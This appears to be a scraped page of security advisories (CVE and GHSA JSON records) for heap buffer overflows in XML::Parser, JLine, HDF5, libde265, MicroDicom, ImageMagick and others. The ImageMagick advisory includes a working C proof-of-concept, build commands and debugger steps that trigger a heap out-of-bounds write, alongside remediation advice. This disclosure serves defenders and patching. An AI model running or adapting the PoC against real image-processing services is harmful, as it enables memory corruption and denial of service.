          "lang": "en",
          "time": "2019-09-24T00:00:00.000Z",
          "value": "Issue migrated to github issue tracker"
        },
        {
          "lang": "en",
          "time": "2019-09-24T00:00:00.000Z",
          "value": "Patch provided in github issue tracker"
        },
        {
          "lang": "en",
          "time": "2019-09-24T00:00:00.000Z",
          "value": "Included in release 2.46 released to CPAN"
        }
      ],
      "title": "XML::Parser versions through 2.45 for Perl could overflow the pre-allocated buffer size cause a heap corruption (double free or corruption) and crashes",
      "workarounds": [
        {
          "lang": "en",
          "value": "Apply the patch that has been publicly available since 2006-06-13."
        }
      ],
      "x_generator": {
        "engine": "cpansec-cna-tool 0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
    "assignerShortName": "CPANSec",
    "cveId": "CVE-2006-10002",
    "datePublished": "2026-03-19T11:03:46.888Z",
    "dateReserved": "2026-03-16T22:47:45.685Z",
    "dateUpdated": "2026-04-29T14:36:41.837Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-2268-98WH-QFHF

Vulnerability from github – Published: 2023-12-29 15:30 – Updated: 2024-01-05 19:49
VLAI
Summary
JLine vulnerable to out of memory error
Details

An issue in the component GroovyEngine.execute of JLine v3.24.1 allows attackers to cause an out of memory (OOM) error exception.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jline:jline-parent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-50572"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-787"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-29T20:08:20Z",
    "nvd_published_at": "2023-12-29T15:15:10Z",
    "severity": "MODERATE"
  },
  "details": "An issue in the component `GroovyEngine.execute` of JLine v3.24.1 allows attackers to cause an out of memory (OOM) error exception.",
  "id": "GHSA-2268-98wh-qfhf",
  "modified": "2024-01-05T19:49:51Z",
  "published": "2023-12-29T15:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50572"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jline/jline3/issues/909"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jline/jline3/commit/f3c60a3e6255e8e0c20d5043a4fe248446f292bb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jline/jline3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "JLine vulnerable to out of memory error"
}

GHSA-228J-W5V9-347H

Vulnerability from github – Published: 2024-03-05 12:30 – Updated: 2025-04-10 21:30
VLAI
Details

A CWE-122 “Heap-based Buffer Overflow” vulnerability in the “logger_generic” function of the “Ax_rtu” binary allows a remote authenticated attacker to trigger a memory corruption in the context of the binary. This may result in a Denial-of-Service (DoS) condition, possibly in the execution of arbitrary code with the same privileges of the process (root), or have other unspecified impacts on the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-45591"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-05T12:15:45Z",
    "severity": "HIGH"
  },
  "details": "A CWE-122 \u201cHeap-based Buffer Overflow\u201d vulnerability in the \u201clogger_generic\u201d function of the \u201cAx_rtu\u201d binary allows a remote authenticated attacker to trigger a memory corruption in the context of the binary. This may result in a Denial-of-Service (DoS) condition, possibly in the execution of arbitrary code with the same privileges of the process (root), or have other unspecified impacts on the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.",
  "id": "GHSA-228j-w5v9-347h",
  "modified": "2025-04-10T21:30:45Z",
  "published": "2024-03-05T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45591"
    },
    {
      "type": "WEB",
      "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2023-45591"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-22G4-7M96-G7PP

Vulnerability from github – Published: 2024-07-30 21:31 – Updated: 2024-08-23 03:30
VLAI
Details

A heap buffer overflow in the function cp_unfilter() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-41437"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-30T19:15:10Z",
    "severity": "MODERATE"
  },
  "details": "A heap buffer overflow in the function cp_unfilter() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.",
  "id": "GHSA-22g4-7m96-g7pp",
  "modified": "2024-08-23T03:30:59Z",
  "published": "2024-07-30T21:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41437"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Helson-S/FuzzyTesting/blob/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/poc/sample6.png"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Helson-S/FuzzyTesting/blob/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/vulDescription.assets/image-20240530183857985.png"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Helson-S/FuzzyTesting/blob/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/vulDescription.md"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Helson-S/FuzzyTesting/tree/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Helson-S/FuzzyTesting/tree/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/poc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-22HH-9PXH-MM6V

Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-07-03 18:40
VLAI
Details

HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T_copy_reopen in H5T.c, resulting in the corruption of the instruction pointer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-32619"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-14T15:36:47Z",
    "severity": "HIGH"
  },
  "details": "HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T_copy_reopen in H5T.c, resulting in the corruption of the instruction pointer.",
  "id": "GHSA-22hh-9pxh-mm6v",
  "modified": "2024-07-03T18:40:37Z",
  "published": "2024-05-14T18:30:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32619"
    },
    {
      "type": "WEB",
      "url": "https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-22P7-2347-C784

Vulnerability from github – Published: 2023-04-05 18:30 – Updated: 2024-04-04 03:22
VLAI
Details

A heap-based buffer overflow vulnerability exists in the way Ichitaro version 2022 1.0.1.57600 processes certain LayoutBox stream record types. A specially crafted document can cause a buffer overflow, leading to memory corruption, which can result in arbitrary code execution.To trigger this vulnerability, the victim would need to open a malicious, attacker-created document.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-22660"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-05T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "A heap-based buffer overflow vulnerability exists in the way Ichitaro version 2022 1.0.1.57600 processes certain LayoutBox stream record types. A specially crafted document can cause a buffer overflow, leading to memory corruption, which can result in arbitrary code execution.To trigger this vulnerability, the victim would need to open a malicious, attacker-created document.",
  "id": "GHSA-22p7-2347-c784",
  "modified": "2024-04-04T03:22:30Z",
  "published": "2023-04-05T18:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22660"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN79149117"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1722"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-232G-H7W4-2PXJ

Vulnerability from github – Published: 2022-04-07 00:00 – Updated: 2022-04-15 00:01
VLAI
Details

Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to 1.0.8.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1253"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-06T12:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to 1.0.8.",
  "id": "GHSA-232g-h7w4-2pxj",
  "modified": "2022-04-15T00:01:08Z",
  "published": "2022-04-07T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1253"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strukturag/libde265/commit/8e89fe0e175d2870c39486fdd09250b230ec10b8"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/1-other-strukturag/libde265"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2023/dsa-5346"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-236W-6XXF-5G8V

Vulnerability from github – Published: 2024-03-01 03:30 – Updated: 2024-03-01 03:30
VLAI
Details

MicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior are affected by a heap-based buffer overflow vulnerability, which could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer. A user must open a malicious DCM file in order to exploit the vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-22100"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-01T01:15:07Z",
    "severity": "HIGH"
  },
  "details": "\n\n\n\n\nMicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior are affected by a heap-based buffer overflow vulnerability, which could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer. A user must open a malicious DCM file in order to exploit the vulnerability.\n\n\n\n\n\n",
  "id": "GHSA-236w-6xxf-5g8v",
  "modified": "2024-03-01T03:30:34Z",
  "published": "2024-03-01T03:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22100"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-23HG-53Q6-HQFG

Vulnerability from github – Published: 2025-09-05 20:09 – Updated: 2025-11-03 21:34
VLAI
Summary
ImageMagick BlobStream Forward-Seek Under-Allocation
Details

Reporter: Lumina Mescuwa
Product: ImageMagick 7 (MagickCore)
Component: MagickCore/blob.c (Blob I/O - BlobStream)
Tested: 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI
Impact: Heap out-of-bounds WRITE (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution


Executive Summary

For memory-backed blobs (BlobStream), SeekBlob() permits advancing the stream offset beyond the current end without increasing capacity. The subsequent WriteBlob() then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset ≫ extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required.


Affected Scope

  • Versions confirmed: 7.1.2-0, 7.1.2-1

  • Architectures: Observed on macOS arm64; architecture-agnostic on LP64

  • Paths: MagickCore blob subsystem — BlobStream (SeekBlob() and WriteBlob()).

  • Not required: External delegates; special policies; integer wraparound


Technical Root Cause

Types (LP64):
offset: MagickOffsetType (signed 64-bit)
extent/length/quantum: size_t (unsigned 64-bit)
data: unsigned char*

Contract mismatch:

  • SeekBlob() (BlobStream) updates offset to arbitrary positions, including past end, without capacity adjustment.

  • WriteBlob() tests offset + length >= extent and grows by length + quantum, doubles quantum, reallocates to extent + 1, then:

    q = data + (size_t)offset; memmove(q, src, length);

    There is no guarantee that extent ≥ offset + length post-growth. With offset ≫ extentq is beyond the allocation.

Wrap-free demonstration:
Initialize extent=1, write one byte (offset=1), seek to 0x10000000 (256 MiB), then write 3–4 bytes. Growth remains << offset + length; the copy overruns the heap buffer.


Exploitability & Reachability

  • Primitive: Controlled bytes written at a controlled displacement from the buffer base.

  • Reachability: Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract permits it, thus creating a latent sink for first- or third-party encoders/writers.

  • Determinism: Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.


Impact Assessment

  • Integrity: High - adjacent object/metadata overwrite plausible.

  • Availability: High - reliably crashable (ASan and non-ASan).

  • Confidentiality: High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.

  • RCE plausibility: Typical of heap OOB writes in long-lived image services; allocator/layout dependent.


CVSS v3.1 Rationale (9.8)

  • AV:N / PR:N / UI:N - server-side image processing is commonly network-reachable without auth or user action.

  • AC:L - a single forward seek + write suffices; no races or specialized state.

  • S:U - corruption localized to the ImageMagick process.

  • C:H / I:H / A:H - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).

Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics.


Violated Invariant

Before copying length bytes at offset, enforce extent ≥ offset + length with overflow-checked arithmetic.

The BlobStream growth policy preserves amortized efficiency but fails to enforce this per-write safety invariant.


Remediation (Principle)

In WriteBlob() (BlobStream case):

  1. Checked requirement:
    need = (size_t)offset + length; → if need < (size_t)offset, overflow → fail.

  2. Ensure capacity ≥ need:
    target = MagickMax(extent + quantum + length, need);
    (Optionally loop, doubling quantum, until extent ≥ need to preserve amortization.)

  3. Reallocate to target + 1 before copying; then perform the move.

Companion hardening (recommended):

  • Document or restrict SeekBlob() on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.

  • Centralize blob arithmetic in checked helpers.

  • Unit tests: forward-seek-then-write (success and overflow-reject).


Regression & Compatibility

  • Behavior change: Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).

  • Memory profile: Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.


Vendor Verification Checklist

  • Reproduce with a minimal in-memory BlobStream harness under ASan.

  • Apply fix; verify extent ≥ offset + length at all write sites.

  • Add forward-seek test cases (positive/negative).

  • Audit other growth sites (SetBlobExtent, stream helpers).

  • Clarify BlobStream seek semantics in documentation.

  • Unit test: forward seek to large offset on BlobStream followed by 1–8 byte writes; assert either growth to need or clean failure.


PoC / Reproduction / Notes

Environment

  • OS/Arch: macOS 14 (arm64)

  • Compiler: clang-17 with AddressSanitizer

  • ImageMagick: Q16-HDRI

  • Prefix: ~/opt/im-7.1.2-0

  • pkg-config: from PATH (no hard-coded /usr/local/...)


Build ImageMagick 7.1.2-0 (static, minimal)

./configure --prefix="$HOME/opt/im-7.1.2-0" --enable-hdri --with-quantum-depth=16 \
  --disable-shared --enable-static --without-modules \
  --without-magick-plus-plus --disable-openmp --without-perl \
  --without-x --without-lqr --without-gslib

make -j"$(sysctl -n hw.ncpu)"
make install

"$HOME/opt/im-7.1.2-0/bin/magick" -version > magick_version.txt

Build & Run the PoC (memory-backed BlobStream)

poc.c:
Uses private headers (blob-private.h) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage.

// poc.c

#include <stdio.h>

#include <stdlib.h>

#include <MagickCore/MagickCore.h>

#include <MagickCore/blob.h>

#include "MagickCore/blob-private.h"



int main(int argc, char **argv) {

MagickCoreGenesis(argv[0], MagickTrue);

ExceptionInfo *e = AcquireExceptionInfo();

ImageInfo *ii = AcquireImageInfo();

Image *im = AcquireImage(ii, e);

if (!im) return 1;



// 1-byte memory blob → BlobStream

unsigned char *buf = (unsigned char*) malloc(1);

buf[0] = 0x41;

AttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0

SetBlobExempt(im, MagickTrue); // don't free our malloc'd buf



// Step 1: write 1 byte (creates BlobInfo + sets offset=1)

unsigned char A = 0x42;

(void) WriteBlob(im, 1, &A);

fprintf(stderr, "[+] after 1 byte: off=%lld len=%zu\n",

(long long) TellBlob(im), (size_t) GetBlobSize(im));



// Step 2: seek way past end without growing capacity

const MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB

(void) SeekBlob(im, big, SEEK_SET);

fprintf(stderr, "[+] after seek: off=%lld len=%zu\n",

(long long) TellBlob(im), (size_t) GetBlobSize(im));



// Step 3: small write → reallocation grows by quantum+length, not to offset+length

// memcpy then writes to data + offset (OOB)

const unsigned char payload[] = "PWN";

(void) WriteBlob(im, sizeof(payload), payload);



// If we get here, it didn't crash

fprintf(stderr, "[-] no crash; check ASan flags.\n");



(void) CloseBlob(im);

DestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);

MagickCoreTerminus();

return 0;

}

run:

# Use the private prefix for pkg-config
export PKG_CONFIG_PATH="$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH"

# Strict ASan for crisp failure
export ASAN_OPTIONS='halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0'

# Compile (static link pulls transitive deps via --static)
clang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \
  $(pkg-config --cflags MagickCore-7.Q16HDRI) \
  $(pkg-config --static --libs MagickCore-7.Q16HDRI)

# Execute and capture
./poc 2>&1 | tee asan.log

Expected markers prior to the fault:

[+] after 1 byte: off=1 len=1
[+] after seek:  off=268435456 len=1

An ASan WRITE crash in WriteBlob follows (top frames: WriteBlob blob.c:<line>, then _platform_memmove / __sanitizer_internal_memmove).


Debugger Verification (manual)

LLDB can be used to snapshot the invariants; ASan alone is sufficient.

lldb ./poc
(lldb) settings set use-color false
(lldb) break set -n WriteBlob
(lldb) run

# First stop (prime write)
(lldb) frame var length
(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped
(lldb) continue

# Second stop (post-seek write)
(lldb) frame var length
(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped
(lldb) expr -- (unsigned long long)image->blob->offset + (unsigned long long)length
(lldb) expr -- (void*)((unsigned char*)image->blob->data + (size_t)image->blob->offset)

# Into the fault; if inside memmove (no locals):
(lldb) bt
(lldb) frame select 1
(lldb) frame var image->blob->offset image->blob->length image->blob->extent image->blob->quantum

Expected at second stop:
type = BlobStream · offset ≈ 0x10000000 (256 MiB) · length ≈ 3–4 · extent ≈ 64 KiB (≪ offset + length) · quantum ≈ 128 KiB · mapped = MagickFalse · data + offset far beyond base; next continue crashes in _platform_memmove.


Credits

Reported by: Lumina Mescuwa


Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-57807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-131",
      "CWE-787"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-05T20:09:19Z",
    "nvd_published_at": "2025-09-05T22:15:34Z",
    "severity": "LOW"
  },
  "details": "**Reporter:**\u00a0Lumina Mescuwa  \n**Product:**\u00a0ImageMagick 7 (MagickCore)  \n**Component:**\u00a0`MagickCore/blob.c`\u00a0(Blob I/O - BlobStream)  \n**Tested:**\u00a07.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI  \n**Impact:**\u00a0Heap out-of-bounds\u00a0**WRITE**\u00a0(attacker-controlled bytes at attacker-chosen offset) \u2192 memory corruption; potential code execution  \n\n---\n\n## Executive Summary\n\nFor memory-backed blobs (**BlobStream**),\u00a0[`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0permits advancing the stream\u00a0**offset**\u00a0beyond the current end without increasing capacity. The subsequent\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0then expands by\u00a0**`quantum + length`**\u00a0(amortized) instead of\u00a0**`offset + length`**, and copies to\u00a0`data + offset`. When\u00a0`offset \u226b extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\u2076\u2074 arithmetic wrap, external delegates, or policy settings are required.\n\n---\n\n## Affected Scope\n\n- **Versions confirmed:**\u00a07.1.2-0, 7.1.2-1\n    \n- **Architectures:**\u00a0Observed on macOS arm64; architecture-agnostic on LP64\n    \n- Paths: MagickCore blob subsystem \u2014\u00a0**BlobStream**\u00a0([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0and\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)).\n    \n- **Not required:**\u00a0External delegates; special policies; integer wraparound\n    \n\n---\n\n## Technical Root Cause\n\n**Types (LP64):**  \n`offset: MagickOffsetType`\u00a0(signed 64-bit)  \n`extent/length/quantum: size_t`\u00a0(unsigned 64-bit)  \n`data: unsigned char*`\n\n**Contract mismatch:**\n\n- [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0(BlobStream) updates\u00a0`offset`\u00a0to arbitrary positions, including past end,\u00a0**without**\u00a0capacity adjustment.\n    \n- [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0tests\u00a0`offset + length \u003e= extent`\u00a0and grows\u00a0**by**\u00a0`length + quantum`, doubles\u00a0`quantum`, reallocates to\u00a0`extent + 1`, then:\n    \n    ```\n    q = data + (size_t)offset;\n    memmove(q, src, length);\n    ```\n    \n    There is\u00a0**no guarantee**\u00a0that\u00a0`extent \u2265 offset + length`\u00a0post-growth. With\u00a0`offset \u226b extent`,\u00a0`q`\u00a0is beyond the allocation.\n    \n\n**Wrap-free demonstration:**  \nInitialize\u00a0`extent=1`, write one byte (`offset=1`), seek to\u00a0`0x10000000`\u00a0(256 MiB), then write 3\u20134 bytes. Growth remains \u003c\u003c\u00a0`offset + length`; the copy overruns the heap buffer.\n\n---\n\n## Exploitability \u0026 Reachability\n\n- **Primitive:**\u00a0Controlled bytes written at a controlled displacement from the buffer base.\n    \n- **Reachability:**\u00a0Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract\u00a0**permits**\u00a0it, thus creating a latent sink for first- or third-party encoders/writers.\n    \n- **Determinism:**\u00a0Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.\n    \n\n---\n\n## Impact Assessment\n\n- **Integrity:**\u00a0High - adjacent object/metadata overwrite plausible.\n    \n- **Availability:**\u00a0High - reliably crashable (ASan and non-ASan).\n    \n- **Confidentiality:**\u00a0High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.\n    \n- **RCE plausibility:**\u00a0Typical of heap OOB writes in long-lived image services; allocator/layout dependent.\n    \n\n---\n\n## CVSS v3.1 Rationale (9.8)\n\n- **AV:N / PR:N / UI:N**\u00a0- server-side image processing is commonly network-reachable without auth or user action.\n    \n- **AC:L**\u00a0- a single forward seek + write suffices; no races or specialized state.\n    \n- **S:U**\u00a0- corruption localized to the ImageMagick process.\n    \n- **C:H / I:H / A:H**\u00a0- A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).\n    \n\n_Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._\n\n---\n\n## Violated Invariant\n\n\u003e **Before copying\u00a0`length`\u00a0bytes at\u00a0`offset`, enforce\u00a0`extent \u2265 offset + length`\u00a0with overflow-checked arithmetic.**\n\nThe BlobStream growth policy preserves amortized efficiency but fails to enforce this\u00a0**per-write**\u00a0safety invariant.\n\n---\n\n## Remediation (Principle)\n\nIn\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0(BlobStream case):\n\n1. **Checked requirement:**  \n    `need = (size_t)offset + length;`\u00a0\u2192 if\u00a0`need \u003c (size_t)offset`, overflow \u2192 